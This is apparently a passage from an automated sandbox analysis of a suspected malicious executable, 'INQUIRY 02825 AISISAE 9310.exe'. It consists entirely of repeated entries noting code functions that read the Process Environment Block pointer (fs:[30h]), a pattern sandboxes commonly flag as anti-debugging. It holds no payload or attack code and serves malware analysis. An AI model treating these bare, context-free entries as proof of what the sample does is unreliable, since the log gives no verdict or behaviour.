Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019965D0 mov eax, dword ptr fs:[00000030h]		0_2_019965D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA5D0 mov eax, dword ptr fs:[00000030h]		0_2_019CA5D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA5D0 mov eax, dword ptr fs:[00000030h]		0_2_019CA5D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE5CF mov eax, dword ptr fs:[00000030h]		0_2_019CE5CF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE5CF mov eax, dword ptr fs:[00000030h]		0_2_019CE5CF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC5ED mov eax, dword ptr fs:[00000030h]		0_2_019CC5ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC5ED mov eax, dword ptr fs:[00000030h]		0_2_019CC5ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019925E0 mov eax, dword ptr fs:[00000030h]		0_2_019925E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h]		0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A26500 mov eax, dword ptr fs:[00000030h]		0_2_01A26500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h]		0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h]		0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h]		0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h]		0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h]		0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h]		0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h]		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998550 mov eax, dword ptr fs:[00000030h]		0_2_01998550
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998550 mov eax, dword ptr fs:[00000030h]		0_2_01998550
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h]		0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h]		0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h]		0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1A4B0 mov eax, dword ptr fs:[00000030h]		0_2_01A1A4B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C44B0 mov ecx, dword ptr fs:[00000030h]		0_2_019C44B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019964AB mov eax, dword ptr fs:[00000030h]		0_2_019964AB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4A49A mov eax, dword ptr fs:[00000030h]		0_2_01A4A49A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019904E5 mov ecx, dword ptr fs:[00000030h]		0_2_019904E5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h]		0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h]		0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h]		0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h]		0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA430 mov eax, dword ptr fs:[00000030h]		0_2_019CA430
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h]		0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h]		0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h]		0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198C427 mov eax, dword ptr fs:[00000030h]		0_2_0198C427
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B245A mov eax, dword ptr fs:[00000030h]		0_2_019B245A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1C460 mov ecx, dword ptr fs:[00000030h]		0_2_01A1C460
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198645D mov eax, dword ptr fs:[00000030h]		0_2_0198645D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE443 mov eax, dword ptr fs:[00000030h]		0_2_019CE443
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h]		0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h]		0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BA470 mov eax, dword ptr fs:[00000030h]		0_2_019BA470
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4A456 mov eax, dword ptr fs:[00000030h]		0_2_01A4A456
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A447A0 mov eax, dword ptr fs:[00000030h]		0_2_01A447A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3678E mov eax, dword ptr fs:[00000030h]		0_2_01A3678E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019907AF mov eax, dword ptr fs:[00000030h]		0_2_019907AF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1E7E1 mov eax, dword ptr fs:[00000030h]		0_2_01A1E7E1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199C7C0 mov eax, dword ptr fs:[00000030h]		0_2_0199C7C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A107C3 mov eax, dword ptr fs:[00000030h]		0_2_01A107C3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019947FB mov eax, dword ptr fs:[00000030h]		0_2_019947FB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019947FB mov eax, dword ptr fs:[00000030h]		0_2_019947FB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h]		0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h]		0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B27ED mov eax, dword ptr fs:[00000030h]		0_2_019B27ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990710 mov eax, dword ptr fs:[00000030h]		0_2_01990710
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C0710 mov eax, dword ptr fs:[00000030h]		0_2_019C0710
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0C730 mov eax, dword ptr fs:[00000030h]		0_2_01A0C730
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC700 mov eax, dword ptr fs:[00000030h]		0_2_019CC700
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C273C mov eax, dword ptr fs:[00000030h]		0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C273C mov ecx, dword ptr fs:[00000030h]		0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C273C mov eax, dword ptr fs:[00000030h]		0_2_019C273C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC720 mov eax, dword ptr fs:[00000030h]		0_2_019CC720
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC720 mov eax, dword ptr fs:[00000030h]		0_2_019CC720
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990750 mov eax, dword ptr fs:[00000030h]		0_2_01990750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2750 mov eax, dword ptr fs:[00000030h]		0_2_019D2750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2750 mov eax, dword ptr fs:[00000030h]		0_2_019D2750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C674D mov esi, dword ptr fs:[00000030h]		0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C674D mov eax, dword ptr fs:[00000030h]		0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C674D mov eax, dword ptr fs:[00000030h]		0_2_019C674D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01998770 mov eax, dword ptr fs:[00000030h]		0_2_01998770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770 mov eax, dword ptr fs:[00000030h]		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A14755 mov eax, dword ptr fs:[00000030h]		0_2_01A14755
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1E75D mov eax, dword ptr fs:[00000030h]		0_2_01A1E75D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01994690 mov eax, dword ptr fs:[00000030h]		0_2_01994690
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01994690 mov eax, dword ptr fs:[00000030h]		0_2_01994690
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C66B0 mov eax, dword ptr fs:[00000030h]		0_2_019C66B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CC6A6 mov eax, dword ptr fs:[00000030h]		0_2_019CC6A6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A106F1 mov eax, dword ptr fs:[00000030h]		0_2_01A106F1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A106F1 mov eax, dword ptr fs:[00000030h]		0_2_01A106F1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]		0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]		0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]		0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]		0_2_01A0E6F2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA6C7 mov ebx, dword ptr fs:[00000030h]		0_2_019CA6C7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA6C7 mov eax, dword ptr fs:[00000030h]		0_2_019CA6C7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2619 mov eax, dword ptr fs:[00000030h]		0_2_019D2619
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A260B mov eax, dword ptr fs:[00000030h]		0_2_019A260B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E609 mov eax, dword ptr fs:[00000030h]		0_2_01A0E609
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199262C mov eax, dword ptr fs:[00000030h]		0_2_0199262C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C6620 mov eax, dword ptr fs:[00000030h]		0_2_019C6620
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C8620 mov eax, dword ptr fs:[00000030h]		0_2_019C8620
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AE627 mov eax, dword ptr fs:[00000030h]		0_2_019AE627
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5866E mov eax, dword ptr fs:[00000030h]		0_2_01A5866E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5866E mov eax, dword ptr fs:[00000030h]		0_2_01A5866E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AC640 mov eax, dword ptr fs:[00000030h]		0_2_019AC640
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C2674 mov eax, dword ptr fs:[00000030h]		0_2_019C2674
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA660 mov eax, dword ptr fs:[00000030h]		0_2_019CA660
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CA660 mov eax, dword ptr fs:[00000030h]		0_2_019CA660
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A189B3 mov esi, dword ptr fs:[00000030h]		0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A189B3 mov eax, dword ptr fs:[00000030h]		0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A189B3 mov eax, dword ptr fs:[00000030h]		0_2_01A189B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019909AD mov eax, dword ptr fs:[00000030h]		0_2_019909AD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019909AD mov eax, dword ptr fs:[00000030h]		0_2_019909AD
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0 mov eax, dword ptr fs:[00000030h]		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1E9E0 mov eax, dword ptr fs:[00000030h]		0_2_01A1E9E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199A9D0 mov eax, dword ptr fs:[00000030h]		0_2_0199A9D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C49D0 mov eax, dword ptr fs:[00000030h]		0_2_019C49D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A269C0 mov eax, dword ptr fs:[00000030h]		0_2_01A269C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C29F9 mov eax, dword ptr fs:[00000030h]		0_2_019C29F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C29F9 mov eax, dword ptr fs:[00000030h]		0_2_019C29F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5A9D3 mov eax, dword ptr fs:[00000030h]		0_2_01A5A9D3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01988918 mov eax, dword ptr fs:[00000030h]		0_2_01988918
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01988918 mov eax, dword ptr fs:[00000030h]		0_2_01988918
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A2892B mov eax, dword ptr fs:[00000030h]		0_2_01A2892B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1892A mov eax, dword ptr fs:[00000030h]		0_2_01A1892A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E908 mov eax, dword ptr fs:[00000030h]		0_2_01A0E908
